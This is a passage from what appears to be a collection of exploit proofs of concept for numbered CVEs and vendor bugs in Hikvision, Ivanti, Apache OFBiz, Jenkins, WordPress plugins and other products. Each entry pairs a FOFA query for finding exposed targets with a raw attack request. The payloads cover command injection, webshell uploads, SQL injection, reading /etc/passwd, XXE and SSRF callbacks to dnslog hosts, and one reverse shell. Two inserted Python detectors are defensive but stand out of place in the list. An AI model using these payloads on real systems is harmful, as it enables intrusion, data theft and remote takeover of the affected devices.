Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD
Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service washing machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DBAPPSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 (DBAPPSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 (Qi An Xin) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin Wangshen (奇安信网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>
103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML document, which is:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
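A defender-side check for the pattern above, added here as an example and not part of the original write-up: it decodes a SAMLRequest form field (plain base64 for the POST binding, base64 of a raw DEFLATE stream for the Redirect binding) and flags any DOCTYPE that declares an external entity. The sample bodies are constructed, and the host attacker.example is a placeholder rather than a value from the page.

```python
"""Flag external-entity declarations inside a SAMLRequest form field.

Added example (not from the original write-up). The sample bodies below are
constructed; attacker.example is a placeholder, not a host from the page.
"""
import base64
import binascii
import re
import zlib
from typing import Optional
from urllib.parse import parse_qs, urlencode

# <!ENTITY name SYSTEM ...> or <!ENTITY % name PUBLIC ...>: an entity that
# makes the XML parser fetch something from outside the document.
_EXTERNAL_ENTITY = re.compile(
    rb"<!ENTITY\s+(?:%\s+)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
_DOCTYPE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)


def decode_saml_request(value: str) -> Optional[bytes]:
    """Return the XML carried by a SAMLRequest value, or None if undecodable.

    The POST binding sends plain base64 of the XML; the Redirect binding sends
    base64 of a raw DEFLATE stream. Padding is repaired first so a truncated
    value is still inspected instead of escaping via a decode error.
    """
    stripped = value.strip()
    padded = stripped + "=" * (-len(stripped) % 4)
    try:
        raw = base64.b64decode(padded)
    except (binascii.Error, ValueError):
        return None
    if raw.lstrip(b" \t\r\n").startswith(b"<"):
        return raw  # already XML: POST binding
    try:
        return zlib.decompress(raw, -15)  # raw DEFLATE, no zlib header
    except zlib.error:
        return raw  # neither form; still run the pattern check over it


def classify_saml_xml(xml: bytes) -> str:
    """'xxe' if an external entity is declared, 'doctype' if any DOCTYPE is
    present (a SAML message never needs one, so it is still worth blocking),
    otherwise 'ok'."""
    if _EXTERNAL_ENTITY.search(xml):
        return "xxe"
    if _DOCTYPE.search(xml):
        return "doctype"
    return "ok"


def inspect_form_body(body: str) -> str:
    """Verdict for an application/x-www-form-urlencoded body as a reverse
    proxy in front of /dana-na/auth/saml-sso.cgi would see it."""
    values = parse_qs(body, keep_blank_values=True).get("SAMLRequest")
    if not values:
        return "ok"  # no SAMLRequest field at all
    xml = decode_saml_request(values[0])
    if xml is None:
        return "undecodable"
    return classify_saml_xml(xml)


# Constructed samples; the entity points at a placeholder host.
MALICIOUS_XML = (b'<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % ext SYSTEM '
                 b'"http://attacker.example/x"> %ext;]><r></r>')
BENIGN_XML = (b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"'
              b' ID="_abc123" Version="2.0" IssueInstant="2024-01-01T00:00:00Z"/>')


def sample_bodies() -> dict:
    """One malicious POST-binding body and two benign ones (POST binding and
    the deflated Redirect-binding form), URL-encoded as a client would send them."""
    deflater = zlib.compressobj(wbits=-15)
    deflated = deflater.compress(BENIGN_XML) + deflater.flush()
    return {
        "malicious": urlencode({"SAMLRequest": base64.b64encode(MALICIOUS_XML).decode()}),
        "benign": urlencode({"SAMLRequest": base64.b64encode(BENIGN_XML).decode()}),
        "benign_deflated": urlencode({"SAMLRequest": base64.b64encode(deflated).decode()}),
    }


if __name__ == "__main__":
    for name, body in sample_bodies().items():
        print(f"{name}: {inspect_form_body(body)}")
```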
104. Totolink T8 device cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}
105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: (replace with your own token)
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
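A parser for the CLI frames in the upload body above, added here as a defensive example (not code from the write-up or from Jenkins): it decodes a `/cli?remoting=false` body so a proxy or IDS can surface arguments that begin with `@`, the args4j file-expansion syntax this CVE abuses. The frame layout (int32 length, one opcode byte, payload) and the opcode numbers are inferred from the captured bytes; that they match Jenkins' own opcode ordering is an assumption.

```python
"""Decode Jenkins plain-CLI frames from a captured /cli?remoting=false body.

Added defensive example; not code from the write-up or from Jenkins. Frame
layout and opcode values are inferred from the captured request in section
109 (assumption: 0=ARG, 1=LOCALE, 2=ENCODING, 3=START, matching the order of
Jenkins' PlainCLIProtocol.Op enum).
"""
import struct
from typing import List, Tuple

OPCODES = {0: "ARG", 1: "LOCALE", 2: "ENCODING", 3: "START"}


def parse_cli_frames(body: bytes) -> List[Tuple[str, bytes]]:
    """Split an upload body into (opcode_name, payload) tuples.

    Each frame is a big-endian int32 `length`, one opcode byte, then `length`
    payload bytes (the opcode byte is not counted in `length`). A truncated or
    inconsistent frame raises ValueError instead of being skipped, so a
    deliberately malformed body is still reported.
    """
    frames = []
    pos = 0
    while pos < len(body):
        if len(body) - pos < 5:
            raise ValueError(f"truncated frame header at offset {pos}")
        (length,) = struct.unpack_from(">I", body, pos)
        op = body[pos + 4]
        start, end = pos + 5, pos + 5 + length
        if end > len(body):
            raise ValueError(f"frame at offset {pos} runs past end of body")
        frames.append((OPCODES.get(op, f"OP_{op}"), body[start:end]))
        pos = end
    return frames


def read_java_utf(payload: bytes) -> str:
    """Decode a DataOutputStream.writeUTF payload: 2-byte length + UTF-8 bytes."""
    if len(payload) < 2:
        raise ValueError("string payload shorter than its length prefix")
    (n,) = struct.unpack_from(">H", payload, 0)
    if 2 + n != len(payload):
        raise ValueError("string length prefix does not match frame length")
    return payload[2:].decode("utf-8", "replace")


def cli_arguments(body: bytes) -> List[str]:
    """Return the command-line arguments the body would hand to the CLI."""
    return [read_java_utf(p) for name, p in parse_cli_frames(body) if name == "ARG"]


def file_expansion_args(body: bytes) -> List[str]:
    """Arguments starting with '@' make args4j read the named file and splice
    its contents into the argument list; these are the ones to block or alert on."""
    return [a for a in cli_arguments(body) if a.startswith("@")]


# The upload body from section 109, as a bytes literal.
SAMPLE_BODY = (
    b"\x00\x00\x00\x06\x00\x00\x04help"
    b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
    b"\x00\x00\x00\x05\x02\x00\x03GBK"
    b"\x00\x00\x00\x07\x01\x00\x05en_US"
    b"\x00\x00\x00\x00\x03"
)

if __name__ == "__main__":
    for name, payload in parse_cli_frames(SAMPLE_BODY):
        print(name, read_java_utf(payload) if payload else "")
    print("file-expansion arguments:", file_expansion_args(SAMPLE_BODY))
```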
110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
